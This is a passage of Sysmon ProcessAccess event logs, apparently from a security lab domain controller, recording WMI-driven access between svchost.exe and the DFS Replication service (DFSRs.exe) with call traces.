C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.943","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2024","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1837,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.943\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2024\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25d35|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2619d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.943","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2024","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25d35|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2619d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1838,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.943\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2024\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+261b7|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.943","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2024","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+261b7|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1839,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.943\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nSourceProcessId: 2916\r\nSourceThreadId: 3312\r\nSourceImage: C:\\Windows\\system32\\DFSRs.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmidcprv.dll+163a4|C:\\Windows\\system32\\wbem\\wmidcprv.dll+166e0|C:\\Windows\\system32\\wbem\\wmidcprv.dll+abad|C:\\Windows\\system32\\wbem\\wmidcprv.dll+b57e|C:\\Windows\\system32\\DFSRs.exe+d839d|C:\\Windows\\system32\\DFSRs.exe+c2ea|C:\\Windows\\system32\\DFSRs.exe+50e1|C:\\Windows\\system32\\DFSRs.exe+72d2|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.943","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","SourceProcessId":"2916","SourceThreadId":"3312","SourceImage":"C:\\Windows\\system32\\DFSRs.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmidcprv.dll+163a4|C:\\Windows\\system32\\wbem\\wmidcprv.dll+166e0|C:\\Windows\\system32\\wbem\\wmidcprv.dll+abad|C:\\Windows\\system32\\wbem\\wmidcprv.dll+b57e|C:\\Windows\\system32\\DFSRs.exe+d839d|C:\\Windows\\system32\\DFSRs.exe+c2ea|C:\\Windows\\system32\\DFSRs.exe+50e1|C:\\Windows\\system32\\DFSRs.exe+72d2|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1840,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.943\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2024\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+264a1|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2669f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25c4b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27476|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27db2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+277c9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26100|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.943","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2024","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+264a1|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2669f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25c4b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27476|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27db2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+277c9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26100|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1841,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.958\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2024\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+5a1b8|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+35a49|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2807f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29591|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292c2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.958","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2024","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+5a1b8|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+35a49|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2807f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29591|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292c2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1842,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.958\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2024\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.958","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2024","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1843,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.958\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2024\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 